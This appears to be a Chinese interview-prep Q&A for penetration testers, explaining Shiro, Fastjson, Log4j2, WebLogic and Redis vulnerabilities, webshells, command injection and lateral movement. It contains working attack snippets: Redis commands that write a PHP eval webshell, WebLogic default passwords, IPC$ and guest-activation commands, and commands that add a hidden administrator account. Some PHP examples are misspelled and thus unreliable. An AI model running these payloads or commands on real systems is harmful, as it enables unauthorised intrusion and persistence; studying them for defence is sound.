平常怎么去发现 Shiro 漏洞的？

Apache Shiro 是一个 Java 安全框架，执行身份验证、授权、密码和会话管理。apacheShiro 框架提供了记住我（RememberMe）的功能，关闭了浏览器下次再打开时还是能记住你是谁，下次访问时无需再登录即可访问。

shiro 反序列化漏洞：shiro 在 CookieRememberMeManaer 类中将 cookie 中 rememberMe  字段内容分别进行序列化、AES 加密、Base64 编码操作。攻击者构造一个恶意的对象，并且对其序列化，AES 加密，base64 编码后，作为 cookie 的 rememberMe 字段发送。Shiro 将 rememberMe 进行解密并且反序列化，最终造成反序列化漏洞。

登陆失败时候会返回 rememberMe=deleteMe 字段或者使用 shiroScan 被动扫描去发现

完整：

未登陆的情况下，请求包的 cookie 中没有 rememberMe 字段，返回包 set-Cookie 里也没有 deleteMe 字段

登陆失败的话，不管勾选 RememberMe 字段没有，返回包都会有 rememberMe=deleteMe 字段

不勾选 RememberMe 字段，登陆成功的话，返回包 set-Cookie 会有 rememberMe=deleteMe 字段。但是之后的所有请求中 Cookie 都不会有 rememberMe 字段

勾选 RememberMe 字段，登陆成功的话，返回包 set-Cookie 会有 rememberMe=deleteMe 字段，还会有 rememberMe 字段，之后的所有请求中 Cookie 都会有 rememberMe 字段

shiro 有几种漏洞类型

shiro 550

shiro 721

Apache Shiro 框架提供了记住我的功能（RemeberMe），用户登录成功后会生成经过加密并编码的 cookie。cookie 的 key 为  RemeberMe，cookie 的值是经过对相关信息进行序列化，然后使用 aes 加密，最后在使用 base64 编码处理形成的

在服务端接收 cookie 值时，按以下步骤解析：

检索 RemeberMe cookie 的值

Base 64 解码

使用 ACE 解密（加密密钥硬编码）

进行反序列化操作（未作过滤处理）

在调用反序列化的时候未进行任何过滤，导致可以触发远程代码执行漏洞

用户登陆成功后会生成经过加密并编码的  cookie，在服务端接收 cookie 值后，Base64 解码 -->AES 解密 --> 反序列化。攻击者只要找到 AES  加密的密钥，就可以构造一个恶意对象，对其进行序列化 -->AES 加密 -->Base64 编码，然后将其作为 cookie 的  rememberMe 字段发送，Shiro 将 rememberMe 进行解密并且反序列化，最终造成反序列化漏洞。

WebLogic 权限绕过的姿势？

CVE-2020-14883 是一个 Console 的未授权访问，而 CVE-2020-14883 是在利用未授权访问的前提下，在 Console 进行代码执行，于是远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console ，并在 WebLogic Server Console 执行任意代码。

1、 通过静态资源来绕过权限验证，防止被重定向到登陆界面。

2、 通过请求 .portal ，控制处理的 Servlet 是渲染 UI 的 MBeanUtilsInitSingleFileServlet 。

3、 通过编码后的 ../ ，让最终渲染的模版是 console.portal 。

综合起来，才造成了最终的未授权访问。

Fastjson 漏洞利用原理？

在请求包里面中发送恶意的 json 格式 payload，漏洞在处理 json 对象的时候，没有对 @type 字段进行过滤，从而导致攻击者可以传入恶意的  TemplatesImpl 类，而这个类有一个字段就是_bytecodes，有部分函数会根据这个_bytecodes 生成 java  实例，这就达到 fastjson 通过字段传入一个类，再通过这个类被生成时执行构造函数。

FastJson 是一个由阿里巴巴研发的 java 库，可以把 java 对象转换为 JSON 格式，也可以把 JSON 字符串转换为对象。

通俗理解就是：漏洞利用 fastjson autotype 在处理 json 对象的时候，未对 @type 字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类连接远程 rmi 主机，通过其中的恶意类执行代码。

攻击者通过这种方式可以实现远程代码执行漏洞的利用，获取服务器的敏感信息泄露，甚至可以利用此漏洞进一步对服务器数据进行修改，增加，删除等操作，对服务器造成巨大影响。

Fastjson RCE 的本质就是在反序列化时会调用目标类的 setter 方法。以 com.sun.rowset.JdbcRowSetImpl Gadget 为例，类中的 setAutoCommit 方法中通过 connect 方法调用了 lookup 方法，且 lookup 方法的参数又能通过  setDataSourceName 方法设置，即其参数可控。那么就会导致 JNDI 注入，最终实现任意命令执行。

Java 处理 Json 格式数据有三个比较流行的类库：

• Gson (google 维护)
• Jackson
• Fastjson

简述一下Redis 未授权访问漏洞。

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将  Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空），会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取  Redis 的数据。攻击者在未授权访问 Redis 的情况下，可以利用 Redis 自身的提供的 config 命令像目标主机写  WebShell、写 SSH 公钥、创建计划任务反弹 Shell 等。其思路都是一样的，就是先将 Redis 的本地数据库存放目录设置为 web 目录、~/.ssh 目录或 /var/spool/cron 目录等，然后将  dbfilename（本地数据库文件名）设置为文件名你想要写入的文件名称，最后再执行 save 或 bgsave  保存，则我们就指定的目录里写入指定的文件了。

redis 绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略，直接暴露在公网。 没有设置密码认证（一般为空），可以免密码远程登录 redis 服务。

config set dir /var/www/html/ 
config set dbfilename shell.php
set xxx "<?php eval($_POST[whoami]);?>" 
save

Redis 未授权访问漏洞如何利用？

服务端的 Redis 连接存在未授权，在攻击机上能用 redis-cli 直接登陆连接，并未登陆验证。 开了服务端存在 Web 服务器，并且知道 Web 目录的路径（如利用 phpinfo，或者错误爆路经），还需要具有文件读写增删改查权限。

讲一下MongoDB 未授权访问漏洞

MongoDB 服务安装后，默认未开启权限验证。如果服务监听在 0.0.0.0，则可远程无需授权访问数据库。

3.0 之前版本的 MongoDB, 默认监听在 0.0.0.0，3.0 及之后版本默认监听在 127.0.0.1。

3.0 之前版本，如未添加用户管理员账号及数据库账号，使用 --auth 参数启动时，在本地通过 127.0.0.1 仍可无需账号密码登陆访问数据库，远程访问则提示需认证；

3.0 及之后版本，使用 --auth 参数启动后，无账号则本地和远程均无任何数据库访问权限。

JNDI 注入是什么？

JNDI RCE 漏洞产生的原因就在于当我们在注册 RMI 服务时，可以指定 Codebase url，也就是远程要加载类的位置，设 置该属性可以让 JDNI 应用程序在加载时去寻找我们指定的类 ( 例如：http://ip:port/EvilObject.class) 。

这里还有一个比较重要的点，也是触发恶意代码的点。就是当 JNDI 应用程序通过 lookup (RMI 服务的地址) 方法调用指 定 Codebase url  上的类后，会调用被远程调用类的构造方法，所以如果我们将恶意代码放在被远程调用类的构造方法中时， 漏洞就会触发。

讲一下WebLogic 系列漏洞

Weblogic 漏洞有哪些？

weblogic 就好多了，基于 T3 协议的反序列化；基于 xml 解析时候造成的反序列化，还有 ssrf，权限绕过等等

Weblogic 反序列化漏洞 CVE-2021-2394
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
Weblogic RCE CVE-2020-14882&14883
weblogic jndi注入CVE-2020-14841
Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644)
WebLogic UniversalExtractor反序列化漏洞 CVE-2020-14645
WebLogic CVE-2020-14756 T3IIOP反序列化RCE
Weblogic 远程代码执行漏洞 CVE-2020-2883
Weblogic CVE-2020-2551 IIOP协议反序列化rce
Weblogic反序列化漏洞 CVE-2019-2890
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
Weblogic反序列化漏洞 CVE-2019-2729
Weblogic任意文件读取漏洞（CVE-2019-2615)）
Weblogic 文件上传漏洞（CVE-2019-2618）
weblogic 反序列化漏洞 CVE-2018-3252
Weblogic反序列化远程代码执行漏洞 CVE-2018-3245
Weblogic远程代码执行漏洞 CVE-2018-3191
Weblogic任意文件上传漏洞（CVE-2018-2894）
Weblogic WLS核心组件反序列化漏洞 CVE-2018-2893
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628
WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）
Weblogic 反序列化漏洞 CVE-2017-3506
Weblogic 反序列化漏洞 CVE-2017-3248
Weblogic SSRF漏洞 CVE-2014-4210

• Weblogic 漏洞扫描工具

安装工具：

1. 安装依赖 python >= 3.6 pip3 install requests

2. 下载 weblogicScanner

   https://github.com/0xn0ne/weblogicScanner

3. 进入 weblogicScanner

4. 举例：测试本机是否存在漏洞 python ws.py -t 127.0.0.1

WebLogic 常用弱口令有哪些？

weblogic Oracl@123
weblogic weblogic
guest guest
portaladmin portaladmin
admin security
joe password
mary password
system security
wlcsystem wlcsystem
wlcsystem sipisystem
system password

简述一下Log4j2 漏洞

Apache Log4j2 是一个基于 Java 的日志记录工具。Apache Log4j 2.x <= 2.14.1 版本存在远程代码执行漏洞。  漏洞的主要原因是 log4j2  的接收器对于不可靠来源的输入没有过滤，攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包，最终触发远程代码执行。由于 Log4j2  组件在处理程序日志记录时存在 JNDI 注入缺陷，未经授权的攻击者利用该漏洞，可向服务器发送恶意的数据，触发 log4j2  组件的缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

为了输出日志时能够方便地输出任意位置的 java 对象，Log4j2 引入了一个叫 Lookup  的统一接口。这个接口允许在写日志的时候，按照具体的实现逻辑去查找对象的位置，并输出对象的内容。这里的对象通常在内存中，但由于 java  支持对象的序列化 / 反序列化，它也可以存储在硬盘文件里，甚至是远程服务器上。

我们提到的 JNDI 就是对 Lookup  接口的一种实现。其本身也是一个接口，提供了命名关键字到对象的映射目录，允许开发者提供一个名称，即可获取到对象的内容。LDAP，即轻量级目录访问协议，是 JNDI 的一种底层实现，它可以让我们方便的查询分布式数据库。既然是分布式的，LDAP  允许从远程服务器加载对象。而这里加载对象时使用的不是一般的反序列化方法，而是通过「命名引用」功能，支持直接从远程下载 class  文件并加载对象。

于是，Log4j2 中就暗含了注入漏洞：允许传入参数解析为 LDAP 协议，从远程服务器下载 class 文件并执行。这个功能本来是为了方便开发，使 java 对象位置对上层应用透明，却不料酿成大祸

简述Struts2 漏洞

Struts2 是 apache 项目下的一个 web 框架，使用 OGNL 作为默认的表达式语言，由于 OGNL  能够创建或更改可执行代码，因此能够为使用它的任何框架引入严重的安全漏洞，多个 Apache Struts 2 版本容易受到 OGNL  安全漏洞的攻击。

WebShell 的利用

Webshell 是黑客经常使用的一种恶意脚本，其目的是获得对服务器的执行操作权限，比如执行系统命令、窃取用户数据、删除 web  页面、修改主页等。黑客通常利用常见的漏洞，如 SQL 注入、远程文件包含 (RFI)、FTP，甚至使用跨站点脚本攻击 (XSS)  等方式作为社会工程攻击的一部分，最终达到控制网站服务器的目的。

黑客可以用 web 的方式，通过 asp 或 php 木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。

Webshell 可以嵌套在正常网页中运行，且不容易被查杀。它还可以穿越服务器防火墙，由于与被控制服务器或远程主机交互的数据都是通过 80  端口传递，因此不会被防火墙拦截，在没有记录流量的情况下，Webshell 使用 post 包发送，也不会被记录在系统日志中，只会在 Web  日志中记录一些数据提交的记录。

• WebShell 的分类 ①根据文件大小分类：大马和小马 (通常指的是一句话木马，能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类：jsp、asp、aspx、php

• WebShell 的利用

  寻找页面上传点

  写好一句话木马（上传木马），比如如下的 PHP 一句话木马的代码：

  _POST['shell']); ?>

  然后寻找上传后的文件位置（绝对路径），可以用蚁剑、中国菜刀等工具连接到主机进行接下来的操作，比如提权。

• WebShell 有哪些特征？

• 持久化远程访问

  Webshell 脚本通常会包含后门，黑客上传 Webshell 之后，就可以充分利用 Webshell  的后门实现远程访问并控制服务器，从而达到长期控制网站服务器的目的。此外，在上传完 Webshell  之后，黑客会选择自己修复漏洞，以确保没有其他人会利用该漏洞。通过这种方式，黑客就可以一种低调的姿态，避免与管理员进行任何交互，同时仍然获得相同的结果。

• 提权

  在服务器没有配置错误的情况下，Webshell 将在 web 服务器的用户权限下运行，而用户权限是有限的。通过 Webshell，黑客可以利用系统上的本地漏洞来实现权限提升，从而获得  Root 权限，这样黑客基本上可以在系统上做任何事情，包括安装软件、更改权限、添加和删除用户、窃取密码、阅读电子邮件等等。

• 隐藏性极强

  Webshell 可以嵌套在正常网页中运行，且不容易被查杀。它还可以穿越服务器防火墙，由于与被控制服务器或远程主机交互的数据都是通过 80  端口传递，因此不会被防火墙拦截，在没有记录流量的情况下，Webshell 使用 post 包发送，也不会被记录在系统日志中，只会在 Web  日志中记录一些数据提交的记录。

• WebShell 常用的 PHP 函数

  Webshell 几乎适用于所有 Web 编程语言。之所以关注 PHP，是因为它是 web 上使用最广泛的编程语言。下面是 PHP 中一些执行 shell 命令最常用的函数。

• system()

  system () 函数将命令作为参数，并输出结果。

  下面的示例是在 Windows 操作系统上运行 dir 命令，然后返回 PHP 文件所在目录的目录列表。

  <?php
      echo system('ls -al');
  

exec()

exec () 功能是将命令作为参数，但不输出结果。

如果指定了第二个可选参数，则返回结果为数组。否则，如果回显，只显示结果的最后一行。

<?php
    echo exce('ls -al');
    echo exce('ls -al',$array);
    var_dump($array);

shell_exec()

shell_exec () 函数类似于 exec ()，但是，其整个输出结果为字符串。

<?php
    echo shell_exce('ls -al');

passthru()

passthru () 执行一个命令并返回原始格式的输出。

<?php
    echo passthru('ls -al');

• proc_open()

  proc_open () 可以创建一个处理程序（流程），实现脚本和要运行的程序之间的通信。

• 倒引号

  PHP 会首先执行 shell 命令中倒引号（`）内的内容

序列化与反序列化

• 序列化：把对象转化为可传输的字节序列过程称为序列化
• 反序列化：把字节序列还原为对象的过程称为反序列

命令执行漏洞是什么

命令执行漏洞是值攻击者可以随意执行系统命令，它属于高危漏洞之一，也属于代码执行的范畴。命令执行漏洞不仅存在 B/S 架构中，还在 C/S 架构中也常常遇到。

应用有时需要调用一些执行系统命令的函数，如 PHP 的 system 、exec、shell_exec、passthru、proc_popen  等，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击，这就是命令执行漏洞。

命令执行漏洞的危害

• 继承 web 服务程序的权限去执行系统命令或读写文件
• 反弹 Shell
• 控制整个网站甚至控制服务器
• 进一步内网渗透

命令执行漏洞的原理

当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如 PHP 中的 system、 exec、shell_exec 等，如果用户可以控制命令执行函数中的参数时，将可以注入恶意系统命令到正常的命令中， 造成命令执行漏洞。

在操作系统中，“&、|、||” 都可以作为命令连接符使用， 用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令，从而造成漏洞。

命令执行漏洞成因

• 代码层过滤不严格

  商业应用需要执行命令，商业应用的一些核心代码可能在二进制文件当中，在 web 应用中通过 system 函数调用。例如 system ("/bin/program --arg c194a9eg<!-- begin-inline-katexarg");

• 系统漏洞造成命令注入

  例如 bash 破壳漏洞 (CVE-2014-6271)，如果我们控制执行的 bash 的环境变量，就可以通过破壳漏洞来执行任意代码。

• 第三方组件造成命令注入

  如 Wordpress，可以选择 ImageMagick 这个常用的 图片处理组件，处理用户上传图片时造成命令执行，如 JAVA 中 Struts2/ElasticsearchGroovy 等。

命令执行漏洞常见函数

• System 函数的语法是： system (string $command [, int &end-inline-katex-->return_var ] )
• 同 C 版本的 system () 函数一样
• 本函数执行 command 参数所指定的命令，并且输出执行结果
• 命令执行后的返回值为输出值的最后一行
• 函数本身也会打印全部的输出值
• Exec 函数的语法为：exec (string output [, int &c194a9eg<!-- begin-inline-katexreturn_var]] )
• 这个函数的作用是执行 command 参数所指定的命令
• 命令执行后的值为输出值的最后一行
• 函数本身不会打印任何内容
• Passthru 函数的语法为：passthru (string $command [, int &end-inline-katex-->return_var ] )
• 同 exec () 函数类似
• passthru () 函数也是用来执行外部命令 command 的
• 当所执行的系统命令输出二进制数据， 并且需要直接传送到浏览器的时候， 需要用此函数来替代 exec () 或 system () 函数。
• Shell_exec 函数的语法为： shell_exec (string $cmd)
• cmd 是要执行的命令
• String 是参数的数据类型，也就是字符串。
• 函数会在命令执行完成后将全部的输出值作为字符串输入返回值，本身并不打印任何信息。
• Shell_exec 函数的用法同反引号形同，注意是反引号（``）而不是普通单引号（’’）。

命令执行漏洞连接符

&: 顺序执行多条命令，而不管命令是否执行成功

&&: 逻辑与，当用此连接符连接多个命令时，前面的命令执行成功，才会执行后面的命令， 前面的命令执行失败，后面的命令不会执行，与 || 正好相反

|: 显示后面命令的结果

||: 逻辑或，当用此连接符连接多个命令时，前面的命令执行成功，则后面的命令不会执行。 前面的命令执行失败，后面的命令才会执行

命令执行漏洞防御

• 不执行外部的应用程序或命令

  尽量使用自定义函数或函数库实现外部应用程序或命令的功能。在 执行 system、eval 等命令执行功能的函数前，要先确定参数内容。

• 使用 escapeshellarg 函数处理相关参数

  Escapeshellarg 函数会将任何引起参数或命令结束的字符进行转义

• 使用 safe_mode_exec_dir 执行可执行的文件路径

  将 php.ini 文件中的 safe_mode 设置为 On，然后将允许执行的文件放入一个目录中，并使用 safe_mode_exec_dir 指定这个可执行的文 件路径。

Winodws 命令执行漏洞介绍

Windows 命令执行漏洞，就是在 Winodws 环境下存在的命令执行漏洞，通过相关的漏洞验证方法确认了存在命令执行漏洞后，我们可以使用 Windows 环境下的一些命令去对漏洞进行利用。

• 通过涉及到主机探测、扫描、路由、协议、远程、进程、端口、服务等常见的 Windows 的命令
• 如果我们的服务器是一台 Windows 操作系统，存在着命令执行漏洞
• 我们就可以通过上面的这些漏洞进行命令执行的操作
• 对 Windows 服务器系统进行扫描探测、进行进程和服务管理、进行内网渗透、服务器提限等

Windows 命令执行漏洞利用**

通过以上的学习我们知道了 Windows 下的命令执行漏洞的原理以及一些利用方法，下面将列出常用到的 Windows 命令，可以利用到 Windows 命令执行的漏洞当中去。

• ipconfig /all 查看网络连接
• net use ipipc$ "" /user:" "    建立 IPC 空链接
• net use ipipc$ "密码" /user:"用户名" 建立 IPC 非空链接
• net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方 C：到本地为 H:
• net use h: ipc$ 登陆后映射对方 C：到本地为 H:
• net use ipipc$ /del 删除 IPC 链接
• net use h: /del 删除映射对方到本地的为 H: 的映射
• net user guest /active:yes 激活 guest 用户
• net user guest 12345 用 guest 用户登陆后用将密码改为 12345
• echo 信息 >> pass.txt 将 "信息" 保存到 pass.txt 文件中

Linux 命令执行漏洞

• Linux 命令执行漏洞，就是在 Linux 服务器上存在的命令执行下漏洞
• Linux 命令执行漏洞相对于 Windows 命令执行漏洞来说，利用起来更加的容易
• 因为 Linux 的一些操作本省就是需要通过一些命令去进行管理和执行

命令在 Linux 中的执行分为 4 步：判断路径、检查别名、判断内外部、路径查找文件

Linux 命令执行漏洞Linux 命令执行漏洞利用

• Linux 系统下基本命令，我们注意这些命令要区分大小写
• 通过这些命令我们可以对 Linux 下的命令执行漏洞进行利用
• 包括系统、资源、进程、网络、用户、服务等常见的 Linux 系统命令

内网渗透

内网渗透基本流程

漏洞挖掘 - 漏洞利用 - 提权准备 - 提权

前提是利用已经控制的一台计算机作为入侵内网的跳板，在其他内网计算机看来访问全部来自于跳板机 (WEB Server)

讲一下自己的渗透经验

查看是否存在一些高危端口，如 443 的心脏滴血，445 的永恒之蓝这两个是我知道的。如果扫到其他端口，那么可以用 metasploit 的 search  命令，去查看是否有相应的漏洞。假如说我们在内网渗透中，通过 nmap 扫到了 samba 服务，那么我们就可以去找一个最新的它的漏洞尝试攻击它。

如何判断网站是否有 CDN？

• 传统访问：用户访问域名 --> 解析服务器 IP--> 访问目标主机
• 普通 CDN：用户访问域名 -->CDN 节点 --> 真实服务器 IP--> 访问目标主机
• 带 WAF 的 CDN：用户访问域名 -->CDN 节点（云 WAF）--> 真实服务器 IP--> 访问目标主机

很简单，使用不同地方的 ping 服务，查看对应 IP 地址是否唯一，如果不唯一则极有可能是使用了 CDN

1、通过 ping 命令，查看回显情况 2、windows 系统环境下，使用 nslookup 进行查询，看返回的域名解析的情况 3、超级 ping 工具，比如”all-tool.cn/tools   /ping“「看 ip 结果」

如何判断靶标站点是 windows/linux？

1、大小写检测：windows 大小写不敏感，而 linux 大小写敏感。

2、PING 指令：根据 TTL 值，winodws 一般情况下 > 100,linux<100 TTL (生存时间值)：该字段指定 IP 包被路由器丢弃之前允许通过的最大网段数量。

如何建立隐藏用户？

1、net user test$ 123456 /add [建立隐藏用户]
2、net localgroup administrators test$ /add

正向代理和反向代理的区别？

正向代理即是客户端代理，代理客户端，服务端不知道实际发起请求的客户端 反向代理即是服务端代理，代理服务端，客户端不知道实际提供服务的服务端

正向 Shell：攻击者连接被攻击者机器，可用于攻击者处于内网，被攻击者处于公网的情况。 反向 Shell：被攻击者主动连接攻击者，可用于攻击者处于外网，被攻击者处于内网的情况。 正向代理即是客户端代理，代理客户端，服务端不知道实际发起请求的客户端. 反向代理即是服务端代理，代理服务端，客户端不知道实际提供服务的服务端

横向渗透命令执行手段？

psexec，wmic，smbexec，winrm，net use 共享 + 计划任务 + type 命令

psexec 和 wmic 或者其他的区别？

psexec 会记录大量日志，wmic 不会记录下日志。wmic 更为隐蔽

域内攻击方法有了解过吗？

MS14-068、Roasting 攻击离线爆破密码、委派攻击，非约束性委派、基于资源的约束委派、ntlm relay

桌面有管理员会话，想要做会话劫持怎么做？

提权到 system 权限，然后去通过工具，就能够劫持任何处于已登录用户的会话，而无需获得该用户的登录凭证。

由于公众号篇幅有限和排版限制，不能将全部内容一并展示，为提升观看体验可以点击下方公众号名片回复关键字后台获取PDF版。